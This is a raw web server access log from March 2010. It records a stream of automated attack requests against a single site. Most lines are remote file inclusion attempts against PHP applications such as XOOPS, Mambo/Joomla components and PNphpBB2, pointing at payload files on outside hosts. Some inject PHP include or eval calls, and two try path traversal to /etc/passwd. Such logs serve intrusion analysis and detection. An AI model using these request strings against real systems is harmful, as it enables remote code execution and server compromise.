200.93.147.154 - - [12/Mar/2010:09:20:07 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:07 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:15 -0800] "GET /logs/access_080712.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:17 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:17 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:17 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:18 -0800] "GET /logs/access_091122.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:20 -0800] "GET /logs/access_080514.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:20:20 -0800] "GET /logs/access_100216.log//components/com_simpleboard/file_upload.php?sbp=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:20:20 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:20:20 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:32 -0800] "GET /logs/access_091122.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:20:32 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:20:32 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:20:33 -0800] "GET /logs/access_090715.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:09:20:50 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:09:20:50 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:09:20:50 -0800] "GET /logs/access_090709.log%20%20//inc/header.php/step_one.php?server_inc=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:09:20:50 -0800] "GET /logs/access_090915.log%20%20//inc/header.php/step_one.php?server_inc=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:20:52 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:21:27 -0800] "GET /logs/access_091122.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:21:28 -0800] "GET /logs/access_080706.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:21:36 -0800] "GET /logs/access_080706.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:21:40 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:41 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:41 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:41 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:42 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:44 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:44 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:44 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:21:44 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:21:47 -0800] "GET /logs/access_091122.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:22:10 -0800] "GET /com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:22:15 -0800] "GET /logs//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:22:15 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:22:15 -0800] "GET /logs/access_080422.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:38 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:38 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:38 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:38 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:42 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:45 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:22:45 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:23:08 -0800] "GET /write_comment_update.php?board_skin_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:23:08 -0800] "GET /logs//write_comment_update.php?board_skin_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:09 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:09 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:09 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:10 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:10 -0800] "GET /logs/access_091023.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:10 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:11 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.108.69 - - [12/Mar/2010:09:23:13 -0800] "GET /logs/access_090206.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:23:21 -0800] "GET /logs/access_080825.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:22 -0800] "GET /write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:22 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:22 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:23:31 -0800] "GET /logs/access_080607.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:23:33 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:23:33 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:23:33 -0800] "GET /logs/access_080325.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:23:40 -0800] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:23:40 -0800] "GET /logs/access_091024.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:23:40 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:23:40 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 200 15080 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:42 -0800] "GET /logs/access_100211.log%20%20//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:23:43 -0800] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:23:43 -0800] "GET /logs/access_080807.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:45 -0800] "GET /write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:45 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:23:45 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:24:08 -0800] "GET /logs/access_100211.log//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:24:11 -0800] "GET /logs/access_091115.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:24:36 -0800] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:24:36 -0800] "GET /logs/access_080807.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:24:56 -0800] "GET /logs/access_090114.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:25:14 -0800] "GET /logs/access_090114.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:25:39 -0800] "GET /logs/access_091125.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:25:40 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:25:42 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:25:54 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:25:56 -0800] "GET /logs/access_080228.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:26:04 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:26:07 -0800] "GET /logs/access_090107.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:26:12 -0800] "GET /logs/access_081103.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:26:22 -0800] "GET /logs/access_080825.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:26:30 -0800] "GET /logs/access_080607.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:26:30 -0800] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:26:31 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:26:32 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 200 15089 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:26:52 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:26:52 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:26:55 -0800] "GET /logs/access_091125.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:27:01 -0800] "GET /logs/access_090206.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:27:01 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:27:11 -0800] "GET /logs/access_090206.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
